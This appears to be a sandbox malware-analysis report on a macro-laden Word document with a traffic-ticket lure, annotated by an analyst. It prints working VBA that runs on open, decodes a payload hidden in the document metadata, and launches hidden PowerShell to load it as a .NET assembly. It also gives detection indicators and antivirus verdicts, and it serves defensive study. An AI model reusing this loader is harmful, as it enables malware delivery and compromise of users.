Static | ZeroBOX

Original


                                        Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Auto-run entry point: Word raises Document_Open when the document is opened
' with macros enabled, so both calls below execute without any further user action.
' Analyst note: this is the trigger for the whole chain in this sample.
Sub Document_Open()
     ' Mycolor is not defined in ThisDocument; in this report it is listed under Module1,
     ' where it decodes data from document metadata and starts PowerShell.
     Call Mycolor
     ' labelc (defined below) clears Label1's picture and rewrites the three label captions.
     Call labelc
End Sub



' Runs when the document is closed and saves the active document in place.
' NOTE(review): presumably this persists the label changes made by labelc at open
' time, so the file on disk differs from the delivered one - confirm by hashing
' the sample before and after opening it in the sandbox.
Private Sub Document_Close()
ActiveDocument.Save
End Sub

' Changes what the embedded label controls display: removes Label1's picture and
' assigns new caption text to Label1, Label2 and Label3. No file, network or
' process activity happens here; that is all in Mycolor (Module1).
' The caption literals are reproduced exactly as the sandbox extracted them. They
' look mis-encoded in this listing, so the intended text cannot be read from here.
' NOTE(review): Label1..Label3 are not declared in this module; presumably they are
' the three ActiveX parts listed in the package (word/activeX/activeX1-3) - confirm.
Private Sub labelc()

' Drops the image shown on Label1.
' NOTE(review): swapping a picture for text at open time is consistent with replacing
' an "enable content" lure image once macros run - inferred, not shown by the code.
Label1.Picture = Nothing

Label1.Caption = "—‚?? ðsžšåÞ?½ R§U—?¯ ©—£—?© —????ñâmå•ñâmå•?¯ —‚?? ¦?¯Â£Þ¥¿ ¶????ðsžšåÞ?½  — »óÞ¢áñ »????—‚? —????—£ޥ¿ æØ¢Ã???????Þ¥¿¯© (39) £½   ¯ —????—£ޥ¿ ¦?¯Â£Þ¥¿© (113)? ráÚÆ R§U—‚? ¶â€š?R§U½  £ ?R§U½    R§U©â€š?R§U½    æØ¢Ã??? ©?¶????½    ¯ »óÞ¢áñ »????—‚? ????©ñâmå•?¶—© (38 £½  ¯ 88). €š?????©— ½ £—R§U????½  áÍÞæ£ñâmå•Â£½  ?R§U½  R§U©â€š??¯ —‚?R§U???¯? ©?——R§U½   æØ¢Ã??? £ ????¶???????¯ ???????? —‚?? ¦????©— æØ¢Ã???????Þ¥¿¯ ¦?¯Â£Þ¥¿© £½"
   
' Appears to be the same literal as the Label1 caption above.
Label2.Caption = "—‚?? ðsžšåÞ?½ R§U—?¯ ©—£—?© —????ñâmå•ñâmå•?¯ —‚?? ¦?¯Â£Þ¥¿ ¶????ðsžšåÞ?½  — »óÞ¢áñ »????—‚? —????—£ޥ¿ æØ¢Ã???????Þ¥¿¯© (39) £½   ¯ —????—£ޥ¿ ¦?¯Â£Þ¥¿© (113)? ráÚÆ R§U—‚? ¶â€š?R§U½  £ ?R§U½    R§U©â€š?R§U½    æØ¢Ã??? ©?¶????½    ¯ »óÞ¢áñ »????—‚? ????©ñâmå•?¶—© (38 £½  ¯ 88). €š?????©— ½ £—R§U????½  áÍÞæ£ñâmå•Â£½  ?R§U½  R§U©â€š??¯ —‚?R§U???¯? ©?——R§U½   æØ¢Ã??? £ ????¶???????¯ ???????? —‚?? ¦????©— æØ¢Ã???????Þ¥¿¯ ¦?¯Â£Þ¥¿© £½"

' The only readable fragment in the three captions is
' "Electronic Traffic Violation Ticket:00073146", which indicates the lure theme.
Label3.Caption = "—‚?? Ø¢Ã???????Þ¥¿¯© (39) £½   ¯ —????—£ޥ¿ ¦?¯Â£Þ½ £—R§U????½  áÍÞæ£ñâmå•Â£½  ?R§U½  R§U©â€š??¯ —‚?R§U???¯? ©?——R§U½   æØ¢Ã??? £ ????¶???????¯ ???????? —‚?? ¦????©— æØ¢Ã???????Þ¥¿¯ ¦?¯Â£Þ¥¿© £½Electronic Traffic Violation Ticket:00073146 »óÞ¢áñ  »óÞ¢áñÞ¢áñ  »óÞ¢áñÞ¢áñ  »óÞ¢áñÞ¢áñ  »óÞ¢áñÞ¢áñ  »óÞ¢áñÞ¢áñ  »óÞ¢áñÞ¢áñ  »óÞ¢áñÞ¢áñ  »óÞ¢áñÞ¢áñ  »óÞ¢áñÞ¢áñ  »óÞ¢áñÞ¢áñ  »óÞ¢áñÞ¢áñ  »óÞ¢áñÞ¢áñ  »óÞ¢áñÞ¢áñ  »óÞ¢áñÞ¢áñ  »óÞ¢áñÞ¢áñ  »óÞ¢áñÞ¢áñ  »óÞ¢áñÞ¢áñ  »óÞ¢áñÞ¢áñ  »óÞ¢áñÞ¢áñ  »óÞ¢áñÞ¢áñ  »óÞ¢áñÞ¢áñ  »óÞ¢áñ "


End Sub



                                    

Deobfuscated


                                        Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Deobfuscated view of the auto-run entry point. Word raises Document_Open when the
' document is opened with macros enabled, so both calls run without user action.
Sub Document_Open()
     ' Defined in Module1 in this report: decodes metadata-borne data and starts PowerShell.
     Call Mycolor
     ' Defined below: clears Label1's picture and rewrites the three label captions.
     Call labelc
End Sub



' Runs when the document is closed and saves the active document in place.
' NOTE(review): presumably keeps the label changes made at open time in the saved
' file - confirm by comparing the sample before and after a sandbox run.
Private Sub Document_Close()
ActiveDocument.Save
End Sub

' Deobfuscated view of labelc: removes Label1's picture and assigns caption text to
' Label1, Label2 and Label3. It only changes what the controls display; the payload
' handling is in Mycolor (Module1).
' The caption literals are kept exactly as extracted and look mis-encoded here, so
' their intended wording cannot be recovered from this listing.
Private Sub labelc()

' Drops the image shown on Label1.
' NOTE(review): consistent with replacing a lure image once macros run - inferred only.
Label1.Picture = Nothing

Label1.Caption = "—‚?? ðsžšåÞ?½ R§U—?¯ ©—£—?© —????ñâmå•ñâmå•?¯ —‚?? ¦?¯Â£Þ¥¿ ¶????ðsžšåÞ?½  — »óÞ¢áñ »????—‚? —????—£ޥ¿ æØ¢Ã???????Þ¥¿¯© (39) £½   ¯ —????—£ޥ¿ ¦?¯Â£Þ¥¿© (113)? ráÚÆ R§U—‚? ¶â€š?R§U½  £ ?R§U½    R§U©â€š?R§U½    æØ¢Ã??? ©?¶????½    ¯ »óÞ¢áñ »????—‚? ????©ñâmå•?¶—© (38 £½  ¯ 88). €š?????©— ½ £—R§U????½  áÍÞæ£ñâmå•Â£½  ?R§U½  R§U©â€š??¯ —‚?R§U???¯? ©?——R§U½   æØ¢Ã??? £ ????¶???????¯ ???????? —‚?? ¦????©— æØ¢Ã???????Þ¥¿¯ ¦?¯Â£Þ¥¿© £½"
   
' Appears to be the same literal as the Label1 caption above.
Label2.Caption = "—‚?? ðsžšåÞ?½ R§U—?¯ ©—£—?© —????ñâmå•ñâmå•?¯ —‚?? ¦?¯Â£Þ¥¿ ¶????ðsžšåÞ?½  — »óÞ¢áñ »????—‚? —????—£ޥ¿ æØ¢Ã???????Þ¥¿¯© (39) £½   ¯ —????—£ޥ¿ ¦?¯Â£Þ¥¿© (113)? ráÚÆ R§U—‚? ¶â€š?R§U½  £ ?R§U½    R§U©â€š?R§U½    æØ¢Ã??? ©?¶????½    ¯ »óÞ¢áñ »????—‚? ????©ñâmå•?¶—© (38 £½  ¯ 88). €š?????©— ½ £—R§U????½  áÍÞæ£ñâmå•Â£½  ?R§U½  R§U©â€š??¯ —‚?R§U???¯? ©?——R§U½   æØ¢Ã??? £ ????¶???????¯ ???????? —‚?? ¦????©— æØ¢Ã???????Þ¥¿¯ ¦?¯Â£Þ¥¿© £½"

' Readable fragment: "Electronic Traffic Violation Ticket:00073146" (lure theme).
Label3.Caption = "—‚?? Ø¢Ã???????Þ¥¿¯© (39) £½   ¯ —????—£ޥ¿ ¦?¯Â£Þ½ £—R§U????½  áÍÞæ£ñâmå•Â£½  ?R§U½  R§U©â€š??¯ —‚?R§U???¯? ©?——R§U½   æØ¢Ã??? £ ????¶???????¯ ???????? —‚?? ¦????©— æØ¢Ã???????Þ¥¿¯ ¦?¯Â£Þ¥¿© £½Electronic Traffic Violation Ticket:00073146 »óÞ¢áñ  »óÞ¢áñÞ¢áñ  »óÞ¢áñÞ¢áñ  »óÞ¢áñÞ¢áñ  »óÞ¢áñÞ¢áñ  »óÞ¢áñÞ¢áñ  »óÞ¢áñÞ¢áñ  »óÞ¢áñÞ¢áñ  »óÞ¢áñÞ¢áñ  »óÞ¢áñÞ¢áñ  »óÞ¢áñÞ¢áñ  »óÞ¢áñÞ¢áñ  »óÞ¢áñÞ¢áñ  »óÞ¢áñÞ¢áñ  »óÞ¢áñÞ¢áñ  »óÞ¢áñÞ¢áñ  »óÞ¢áñÞ¢áñ  »óÞ¢áñÞ¢áñ  »óÞ¢áñÞ¢áñ  »óÞ¢áñÞ¢áñ  »óÞ¢áñÞ¢áñ  »óÞ¢áñÞ¢áñ  »óÞ¢áñ "


End Sub



                                    

Original


                                        Attribute VB_Name = "Module1"
' Hex decoder: converts a string of hexadecimal digits into a byte array, two
' digits per byte.
'   he      - hex text (passed ByVal, so the padding below does not alter the caller's copy).
'   returns - Byte() holding one element per digit pair.
' Analyst note: the only caller in this module is Mycolor, which feeds it the
' document's "Comments" property, so the decoded bytes come from document metadata
' rather than from the macro source.
Private Function abc(ByVal he As String) As Byte()
    Dim n As Long
    Dim ic As Long
    Dim bArr() As Byte
    ic = Len(he)
    ' Odd length: left-pad with "0" so the text splits into whole two-digit pairs.
    If (ic And 1) = 1 Then
        he = "0" & he
        ic = ic + 1
    End If
    
    ' Zero-based array sized to the number of pairs. An empty input gives an upper
    ' bound of -1 here, which VBA is expected to reject with a run-time error.
    ReDim bArr(ic \ 2 - 1)
    For n = 1 To ic Step 2
        
        ' "&H" makes CByte parse the two characters as hexadecimal; a non-hex
        ' character is expected to raise a type-mismatch error rather than be skipped.
        bArr((n - 1) \ 2) = CByte("&H" & Mid$(he, n, 2))
    Next
    
    abc = bArr
End Function



' Payload staging and execution, called from Document_Open:
'   1. reads the built-in "Comments" document property,
'   2. hex-decodes it with abc and writes the bytes to %TMP%\skfk.txt,
'   3. starts PowerShell to load that file as a .NET assembly, create Tysdf.Class1
'      and call its sadkj() method.
' What the assembly itself does is not visible in this macro.
' Detection notes: Word spawning PowerShell through WScript.Shell with a hidden
' window; a "[Reflection.Assembly]::LoadFile" command line pointing into %TMP%;
' a file named skfk.txt in %TMP% whose content is binary rather than text; and a
' long hex string in the document's Comments metadata.
' s, fnum, FName, fr and Result are not declared in this procedure.
Sub Mycolor()

Dim prop As DocumentProperty
    ' Walks every built-in property and keeps the value of "Comments".
    ' If that property were missing, s would stay unassigned.
    For Each prop In ActiveDocument.BuiltInDocumentProperties
        If prop.Name = "Comments" Then
            s = prop.Value
        End If
    Next
fnum = FreeFile
' Drop path: the user's temp directory; the .txt extension does not reflect the content.
FName = Environ("TMP") & "\skfk.txt"
Open FName For Binary As #fnum
        ' Writes the decoded bytes as raw binary.
        Put #fnum, , abc(CStr(s))
    
Close #fnum


' Same path as FName, wrapped in single quotes for use inside the PowerShell command.
fr = "'" & Environ("TMP") & "\skfk.txt" & "'"
Result = "Powershell [Reflection.Assembly]::LoadFile(" & fr & ");$doo = New-Object Tysdf.Class1;$doo.sadkj()"
' Run arguments: 0 = hidden window, True = wait until PowerShell exits, which
' delays the labelc call that follows in Document_Open.
CreateObject("WScript.Shell").Run Result, 0, True


End Sub




                                    

Deobfuscated


                                        Attribute VB_Name = "Module1"
' Deobfuscated view of the hex decoder: turns a string of hexadecimal digits into
' a byte array, two digits per byte.
'   he      - hex text (ByVal, so padding does not change the caller's string).
'   returns - Byte() with one element per digit pair.
' Analyst note: Mycolor is the only caller shown and passes the document's
' "Comments" property, so the decoded data originates in document metadata.
Private Function abc(ByVal he As String) As Byte()
    Dim n As Long
    Dim ic As Long
    Dim bArr() As Byte
    ic = Len(he)
    ' Odd length: left-pad with "0" to get whole two-digit pairs.
    If (ic And 1) = 1 Then
        he = "0" & he
        ic = ic + 1
    End If
    
    ' Zero-based array with one slot per pair; an empty input yields an upper bound
    ' of -1, which VBA is expected to reject at run time.
    ReDim bArr(ic \ 2 - 1)
    For n = 1 To ic Step 2
        
        ' The "&H" prefix makes CByte read the pair as hexadecimal.
        bArr((n - 1) \ 2) = CByte("&H" & Mid$(he, n, 2))
    Next
    
    abc = bArr
End Function



' Deobfuscated view of the staging routine called from Document_Open. It reads the
' "Comments" document property, hex-decodes it with abc, writes the bytes to
' %TMP%\skfk.txt, then starts PowerShell to load that file as a .NET assembly,
' instantiate Tysdf.Class1 and call sadkj(). The only difference from the original
' listing is that the quoted-path concatenation has been folded into one literal.
' Indicators visible here: the file name skfk.txt under %TMP%, the type name
' Tysdf.Class1, the method name sadkj, and a PowerShell command line containing
' "[Reflection.Assembly]::LoadFile" started by the Office process.
' s, fnum, FName, fr and Result are not declared in this procedure.
Sub Mycolor()

Dim prop As DocumentProperty
    ' Scans the built-in properties and keeps the value of "Comments".
    For Each prop In ActiveDocument.BuiltInDocumentProperties
        If prop.Name = "Comments" Then
            s = prop.Value
        End If
    Next
fnum = FreeFile
' Drop path in the user's temp directory; the extension does not match the content.
FName = Environ("TMP") & "\skfk.txt"
Open FName For Binary As #fnum
        ' Raw binary write of the decoded bytes.
        Put #fnum, , abc(CStr(s))
    
Close #fnum


' Single-quoted copy of the drop path for the PowerShell command line.
fr = "'" & Environ("TMP") & "\skfk.txt'"
Result = "Powershell [Reflection.Assembly]::LoadFile(" & fr & ");$doo = New-Object Tysdf.Class1;$doo.sadkj()"
' 0 = hidden window, True = block until PowerShell exits.
CreateObject("WScript.Shell").Run Result, 0, True


End Sub




                                    
[Content_Types].xml
_rels/.rels
word/document.xml
9]eJ/2r
}~rb;P
h:!]3{N
word/_rels/document.xml.rels
M//&/P1t
word/vbaProject.bin
6D3b;b
vp|m[__,Rz
w3;55xa
RLJcL|j
a3ll`-
F;s^*2
?.Qt%B
OaQ69GRo
}<;AZyT
UN+lG.
Zd[g7j
G!tPT&
ZCFLOW
W.3=M/tf:O
r6X]u.
word/media/image1.wmf
R"IROKb
S%IROHb
vhAp!\
z+Scc\v
B-^.Nq
n6fl5*
:7q8h~b
}p|:~E
^f/c2\f
^-(Auv
V;.s4d[+
:2A:dQ
Q#g$'n_
_>|WHI
m@Ta/
B#_gPC
_NY|[
aSRFNIJ
}@p0~X
FZ>&fMJ
;L$:WS
jclezy
^>K"jz
&0VZTU&}
*bUi:I
O>@;Is30
^ncA+!
hO>~`Sc
cEyKUR8
Ym5g(`t
)D/scL
CQgcH#
8w}>'|
xYnfKM
4xAD PbD`
%8M'y<g9i
\]NiKu
lC_aGT
[f*$7,
)_[nWg
/6x}=W`N
v}/}-u
C#_I7C
:E'B[9E
word/media/image2.wmf\R
Xci49
M0N'id
word/media/image3.wmf
word/theme/theme1.xml
n!td[;
5}4Onb
word/_rels/vbaProject.bin.relsl
-\Ya;>>
word/vbaData.xml
2bb=r
wk!5^&
ITYN6b8
word/settings.xml
5R@AD]
,*D!+W
98 P{k(
^MP~[TI
word/styles.xml
^?d*g3
}UYYDO
B$b46-
s<{w?u{
i5+[MkI
Io3E&H
Q)aaT2X
word/webSettings.xml
]?cv0$G
word/activeX/activeX1.xmld
word/activeX/activeX1.bin
dneiieI
T4tp$(
[U>MnUq
HtKP`Dd?
z,">1?
?+ SLn
*t<"jZ:.
~%rLq
obb95I
:A+ioq
RN!}x
ky9[?VV
6zU~}l
word/activeX/activeX2.xmld
word/activeX/activeX2.bin
2o>FF}?
word/activeX/activeX3.xmld
word/activeX/activeX3.bin
57)5%%5E
word/fontTable.xml
docProps/core.xml
SZMd<Y
33,7rn#
E*F/bP7
I'>;'Z+&
ho^j<m%
F2R.k8
,o~%&\
"O%O'
Csyyx6
}[~@U{
docProps/app.xml
UY^sxAp5
word/activeX/_rels/activeX1.xml.relsl
>OO/`
word/activeX/_rels/activeX2.xml.relsl
word/activeX/_rels/activeX3.xml.relsl
[Content_Types].xmlPK
_rels/.relsPK
word/document.xmlPK
word/_rels/document.xml.relsPK
word/vbaProject.binPK
word/media/image1.wmfPK
word/media/image2.wmfPK
word/media/image3.wmfPK
word/theme/theme1.xmlPK
word/_rels/vbaProject.bin.relsPK
word/vbaData.xmlPK
word/settings.xmlPK
word/styles.xmlPK
word/webSettings.xmlPK
word/activeX/activeX1.xmlPK
word/activeX/activeX1.binPK
word/activeX/activeX2.xmlPK
word/activeX/activeX2.binPK
word/activeX/activeX3.xmlPK
word/activeX/activeX3.binPK
word/fontTable.xmlPK
docProps/core.xmlPK
docProps/app.xmlPK
word/activeX/_rels/activeX1.xml.relsPK
word/activeX/_rels/activeX2.xml.relsPK
word/activeX/_rels/activeX3.xml.relsPK
Antivirus Signature
Bkav Clean
Lionic Clean
Elastic malicious (high confidence)
DrWeb modification of W97M.Suspicious.1
Cynet Clean
CMC Clean
CAT-QuickHeal Clean
ALYac Clean
Malwarebytes Clean
Zillya Clean
Sangfor Clean
K7AntiVirus Clean
BitDefender VB.Heur2.PwShell.2.44355A71.Gen
K7GW Clean
BitDefenderTheta Clean
Cyren Clean
Symantec ISB.Downloader!gen84
ESET-NOD32 Clean
TrendMicro-HouseCall Clean
Avast Clean
ClamAV Clean
Kaspersky HEUR:Trojan-Downloader.Script.Generic
Alibaba Clean
NANO-Antivirus Trojan.Ole2.Vbs-heuristic.druvzi
SUPERAntiSpyware Clean
MicroWorld-eScan VB.Heur2.PwShell.2.44355A71.Gen
Rising Clean
Ad-Aware VB.Heur2.PwShell.2.44355A71.Gen
Sophos Clean
Comodo Clean
F-Secure Clean
Baidu Clean
VIPRE Clean
TrendMicro Clean
McAfee-GW-Edition BehavesLike.Downloader.qc
FireEye VB.Heur2.PwShell.2.44355A71.Gen
Emsisoft VB.Heur2.PwShell.2.44355A71.Gen (B)
SentinelOne Static AI - Malicious OPENXML
Avast-Mobile Clean
Jiangmin Clean
Avira Clean
MAX malware (ai score=87)
Antiy-AVL Clean
Kingsoft Clean
Microsoft Clean
Gridinsoft Clean
Arcabit VB.Heur2.PwShell.2.44355A71.Gen
ViRobot Clean
ZoneAlarm HEUR:Trojan-Downloader.Script.Generic
GData VB.Heur2.PwShell.2.44355A71.Gen
AhnLab-V3 Clean
Acronis Clean
McAfee Clean
TACHYON Suspicious/WOX.Obfus.Gen.8
VBA32 Clean
Zoner Clean
Tencent Heur.Macro.Generic.a.14e6b9e2
Yandex Clean
Ikarus Clean
MaxSecure Clean
Fortinet VBA/Agent.2EA16!tr.dldr
Panda Clean
No IRMA results available.